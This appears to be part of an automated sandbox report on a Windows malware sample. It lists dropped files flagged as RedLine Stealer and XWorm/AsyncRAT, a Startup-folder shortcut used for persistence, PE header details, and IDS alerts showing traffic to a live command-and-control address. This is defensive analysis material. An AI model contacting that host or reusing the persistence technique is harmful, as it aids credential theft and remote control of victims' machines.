                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_niyysnoz.fxl.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrrdshmf.0su.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ou3jmx03.vsz.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxexeleb.bq5.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxgiaa1v.yfc.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scyhx4ro.0ke.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub2z3zoy.wij.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5yzuhyb.goi.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Roaming\Chrome.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Metin.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):52736
                                                                                                                  Entropy (8bit):5.903993484109811
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:FLdZOZzmUfksaHE1A/8VgrtADehQhueHa25b/8yp7XTA6xUOZthphknP:Fx4zxIk56rWqHQb/8yJDA6xUOrEP
                                                                                                                  MD5:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  SHA1:A0F494B321EF5BD5B95F60D4EE9E4AE836D73B8A
                                                                                                                  SHA-256:08A5AB51F8EEE96D3837AAEF4D74BF672D937056118003ECFA0E4DF9DAE49125
                                                                                                                  SHA-512:259BD4D63BD69CDFD9A29303DC5EF3174136353DAAD23747C4589ED5B760D9905285211850BF49FDE37C0BA355F3E463DF6633A518AFFB270CFEB9F24885508C
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: ditekSHen
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: P7UN3WhDhK.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{.f................................. ........@.. .......................@............@.................................8...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................p.......H........]..........&.....................................................(....*.r...p*. ..e.*..(....*.r...p*. ..&.*.s.........s.........s.........s.........*.r1..p*. ...*.rI..p*. ....*.ra..p*. .x!.*.ry..p*. ....*.r...p*. .\=.*..((...*.r...p*. ~..*.r...p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(X...*&(....&+.*.+5si... .... .'..oj...(*...~....-.(\...(N...~....ok...&.-.*.r...p*.r...p*. ~.H.*.r...p*.r...p*. ..'.*.r#..p*. ....*.r;..p*. ..J.*.rS..p*.rk..p*. m.`.*.r...p

                                                                                                                  C:\Users\user\AppData\Roaming\M2.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\f5ATZ1i5CU.exe
                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):97792
                                                                                                                  Entropy (8bit):5.960657075530222
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:Nqsuoqu3lbG6jejoigIH43Ywzi0Zb78ivombfexv0ujXyyed2ptmulgS6pIl:771FYH+zi0ZbYe1g0ujyzdpI
                                                                                                                  MD5:2598B5FEE38D9C0979F009E77F94EA33
                                                                                                                  SHA1:9C2C0F0734FBF16853DE911868024DFBED91E5EC
                                                                                                                  SHA-256:00A709BACA231F15267526D7B5DB11CD94B0089ED6CFD1667A1FF2EBD584C266
                                                                                                                  SHA-512:D6FA07FDFA6493C3ABE95C650DCA114B1737D8812FE86476EF8AFBB1D34E50B537821A7958ACDC243246484FC4F28DD208DB4328663BBC22EC79AE34F3340C8E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: unknown
                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: ditekSHen
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: P7UN3WhDhK.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@....................................K.................................................................................... ............... ..H............text...Ds... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................ .......H...........<.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o

                                                                                                                  C:\Users\user\AppData\Roaming\Metin.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\f5ATZ1i5CU.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):52736
                                                                                                                  Entropy (8bit):5.903993484109811
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:FLdZOZzmUfksaHE1A/8VgrtADehQhueHa25b/8yp7XTA6xUOZthphknP:Fx4zxIk56rWqHQb/8yJDA6xUOrEP
                                                                                                                  MD5:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  SHA1:A0F494B321EF5BD5B95F60D4EE9E4AE836D73B8A
                                                                                                                  SHA-256:08A5AB51F8EEE96D3837AAEF4D74BF672D937056118003ECFA0E4DF9DAE49125
                                                                                                                  SHA-512:259BD4D63BD69CDFD9A29303DC5EF3174136353DAAD23747C4589ED5B760D9905285211850BF49FDE37C0BA355F3E463DF6633A518AFFB270CFEB9F24885508C
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: ditekSHen
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{.f................................. ........@.. .......................@............@.................................8...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................p.......H........]..........&.....................................................(....*.r...p*. ..e.*..(....*.r...p*. ..&.*.s.........s.........s.........s.........*.r1..p*. ...*.rI..p*. ....*.ra..p*. .x!.*.ry..p*. ....*.r...p*. .\=.*..((...*.r...p*. ~..*.r...p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(X...*&(....&+.*.+5si... .... .'..oj...(*...~....-.(\...(N...~....ok...&.-.*.r...p*.r...p*. ~.H.*.r...p*.r...p*. ..'.*.r#..p*. ....*.r;..p*. ..J.*.rS..p*.rk..p*. m.`.*.r...p

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Metin.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 9 09:06:04 2024, mtime=Mon Dec 9 09:06:04 2024, atime=Mon Dec 9 09:06:04 2024, length=52736, window=hide
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):758
                                                                                                                  Entropy (8bit):5.043342147845556
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:8ng4IZ+OSYChtlZY//16GfLA/MKfLsLL+jAXNHCu1LZzcfxcfPmV:8RIZ+sWSd684js/CA5R9c2nm
                                                                                                                  MD5:DFC321771449C4ABBFCCF7099940552E
                                                                                                                  SHA1:686AC4D300B5714F7BDA48BB5FFABBCF71E06E27
                                                                                                                  SHA-256:E22AC0179DB6BFBAEAE2AF949F0011B4F2DD7B4EB16D018B447EDA9C537460AB
                                                                                                                  SHA-512:994659296832C33A4D5BB5D97D999F2EC680C9763A72A02A90688D132953E1D7C6B5D8D1D7009EED9A7D5C6CF327577D22FA053C49D8564ABBFF012819951473
                                                                                                                  Malicious:false
                                                                                                                  Preview:L..................F.... .....J.!J....J.!J....J.!J..........................t.:..DG..Yr?.D..U..k0.&...&.........5q...;...!J......!J......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.P...........................c..A.p.p.D.a.t.a...B.V.1......Y.P..Roaming.@......EW)N.Y.P..........................Pi..R.o.a.m.i.n.g.....`.2......Y.P .Chrome.exe..F......Y.P.Y.P...._.........................C.h.r.o.m.e...e.x.e.......W...............-.......V.............#......C:\Users\user\AppData\Roaming\Chrome.exe........\.....\.....\.....\.....\.C.h.r.o.m.e...e.x.e.`.......X.......928100...........hT..CrF.f4... .*........+...E...hT..CrF.f4... .*........+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                  Entropy (8bit):7.104771157989001
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                  File name:f5ATZ1i5CU.exe
                                                                                                                  File size:261'120 bytes
                                                                                                                  MD5:854a42e9a581b2a33ceda0f3d3dd2f04
                                                                                                                  SHA1:a100a400e570039823c4fd79dc470c13ccfbb266
                                                                                                                  SHA256:fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80
                                                                                                                  SHA512:569dc63dc90b1a6efebb9130d2dce133d3600937a1a6440575037b2b8d36b6aff8c607b86ba2ff0192324ed9cbae519e8a4aa3d9dd6e4b3b6f9d8483e043e1c0
                                                                                                                  SSDEEP:3072:y1hoF2jJ6wiPa1XzwIxJLp7tUE1NgBS5Bs//dm63NzzEfHs/FtMtO2NcSINUc9nR:y1hnJ6D1IxPtUyNrsHdmqEfETrSc9nCu
                                                                                                                  TLSH:EF448B4DA718CA11E2FE1F72E9738DC235E82E6EACC15AC026E7F6541BB25430B704B4
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................p....@.......................... .............................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:66dba9565ca99a4e

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4014d1
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                  DLL Characteristics:
                                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:a9c887a4f18a3fede2cc29ceea138ed3

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 00000008h
                                                                                                                  nop
                                                                                                                  mov eax, 00000004h
                                                                                                                  push eax
                                                                                                                  mov eax, 00000000h
                                                                                                                  push eax
                                                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B7330Dh
                                                                                                                  add esp, 0Ch
                                                                                                                  mov eax, 004014AFh
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B73347h
                                                                                                                  mov eax, 00000001h
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B73344h
                                                                                                                  add esp, 04h
                                                                                                                  mov eax, 00030000h
                                                                                                                  push eax
                                                                                                                  mov eax, 00010000h
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B73338h
                                                                                                                  add esp, 08h
                                                                                                                  mov eax, dword ptr [00426E24h]
                                                                                                                  mov ecx, dword ptr [00426E28h]
                                                                                                                  mov edx, dword ptr [00426E2Ch]
                                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                                  lea eax, dword ptr [ebp-04h]
                                                                                                                  push eax
                                                                                                                  mov eax, dword ptr [00427000h]
                                                                                                                  push eax
                                                                                                                  push edx
                                                                                                                  push ecx
                                                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B73312h
                                                                                                                  add esp, 14h
                                                                                                                  mov eax, dword ptr [00426E24h]
                                                                                                                  mov ecx, dword ptr [00426E28h]
                                                                                                                  mov edx, dword ptr [00426E2Ch]
                                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                                  mov eax, dword ptr [edx]
                                                                                                                  push eax
                                                                                                                  mov eax, dword ptr [ecx]
                                                                                                                  push eax
                                                                                                                  mov eax, dword ptr [ebp-08h]
                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B730ECh
                                                                                                                  add esp, 0Ch
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B732E8h
                                                                                                                  add esp, 04h
                                                                                                                  leave
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 00000004h
                                                                                                                  nop
                                                                                                                  mov eax, dword ptr [00426E24h]
                                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                                  mov dword ptr [eax], ecx
                                                                                                                  mov eax, dword ptr [00000000h]

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x26db00x50.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x19e1c.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x26e000x58.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x6680x80024a124dd2e4f1717de0fe655f139010dFalse0.40673828125data4.602726461688375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x20000x24fb30x250006b1a58764e2b373cfb124e0122ce55beFalse0.7479478990709459data7.144663458144612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .bss0x270000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x280000x19e1c0x1a000c600d9c76ddfc7336d35c84936556111False0.5116624098557693data6.008443448480672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0x281440xb170PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9995817189151109
                                                                                                                  RT_ICON0x332b40xe8a8Device independent bitmap graphic, 120 x 240 x 32, image size 57600, resolution 2835 x 2835 px/mEnglishUnited States0.13287441235728678
                                                                                                                  RT_GROUP_ICON0x41b5c0x14dataEnglishUnited States1.15
                                                                                                                  RT_GROUP_ICON0x41b700x14data0.95
                                                                                                                  RT_MANIFEST0x41b840x296XML 1.0 document, ASCII textEnglishUnited States0.4607250755287009

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  msvcrt.dllmalloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                                                                                  shell32.dllShellExecuteA
                                                                                                                  kernel32.dllSetUnhandledExceptionFilter

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-09T11:05:00.561202+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049704192.169.69.2637552TCP
                                                                                                                  2024-12-09T11:05:16.188278+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049740192.169.69.2637552TCP
                                                                                                                  2024-12-09T11:05:31.798637+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049777192.169.69.2637552TCP
                                                                                                                  2024-12-09T11:05:47.256001+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049813192.169.69.2637552TCP
                                                                                                                  2024-12-09T11:06:02.699270+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049849192.169.69.2637552TCP
                                                                                                                  2024-12-09T11:06:18.133356+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049885192.169.69.2637552TCP
                                                                                                                  2024-12-09T11:06:33.645441+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049923192.169.69.2637552TCP
                                                                                                                  2024-12-09T11:06:49.183070+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.1049960192.169.69.2637552TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 9, 2024 11:04:50.014102936 CET4970437552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:04:50.133457899 CET3755249704192.169.69.26192.168.2.10
